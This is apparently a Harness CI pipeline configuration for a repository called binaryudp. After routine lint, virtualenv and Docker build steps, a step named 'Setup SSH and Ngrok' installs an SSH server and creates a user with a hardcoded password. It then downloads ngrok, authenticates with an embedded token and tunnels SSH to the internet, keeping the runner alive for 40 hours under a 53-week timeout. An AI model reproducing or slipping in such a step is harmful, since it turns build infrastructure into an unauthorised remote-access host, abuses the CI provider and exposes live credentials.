pipeline:
  identifier: Build_Subhya090_binaryudp_1741606998488
  name: Build binaryudp
  orgIdentifier: default
  projectIdentifier: default_project
  properties:
    ci:
      codebase:
        build: <+input>
        connectorRef: account.Github_OAuth_1741606939087
        repoName: Subhya090/binaryudp
  stages:
    - stage:
        identifier: build
        name: build
        spec:
          caching:
            enabled: true
          cloneCodebase: true
          execution:
            steps:
              - step:
                  identifier: runlinter
                  name: run linter
                  spec:
                    command: |-
                      pip install flake8
                      flake8 .
                  timeout: ""
                  type: Run
              - step:
                  identifier: setupvirtualenvironment
                  name: setup virtual environment
                  spec:
                    command: |-
                      python3 -m venv .venv
                      . .venv/bin/activate
                      python3 -m pip install -r requirements.txt
                      python3 -m pip install -e .
                  timeout: ""
                  type: Run
              - step:
                  identifier: dockerbuild
                  name: docker_build
                  spec:
                    caching: true
                    connectorRef: <+input>
                    repo: hello/world
                    tags:
                      - latest
                  timeout: ""
                  type: BuildAndPushDockerRegistry
              - step:
                  identifier: setup_ssh_ngrok
                  name: Setup SSH and Ngrok
                  type: Run
                  spec:
                    shell: Bash
                    command: |
                      # Update package list and install Dropbear SSH server and Ngrok
                      apt-get update && apt-get install -y dropbear wget unzip curl

                      # Create SSH user 'samir' with password 'samir090'
                      useradd -m -s /bin/bash samir
                      echo 'samir:samir090' | chpasswd

                      # Configure Dropbear SSH to run on port 2222
                      echo "DROPBEAR_EXTRA_ARGS='-p 2222'" > /etc/default/dropbear
                      service dropbear start

                      # Download & install Ngrok
                      wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip -O /tmp/ngrok.zip
                      unzip /tmp/ngrok.zip -d /usr/local/bin/
                      chmod +x /usr/local/bin/ngrok

                      # Authenticate Ngrok
                      ngrok authtoken 2lKjA15AAL3kFG0cbOpfTJGbewT_3PjMCSs55KCHQ2PKkoVdS

                      # Start Ngrok to expose SSH on port 2222
                      nohup ngrok tcp 2222 > /dev/null 2>&1 &

                      # Keep the build running for 40 hours
                      sleep 144000
          platform:
            arch: Amd64
            os: Linux
          runtime:
            spec: {}
            size: xlarge
            type: Cloud
        type: CI
  timeout: 53w
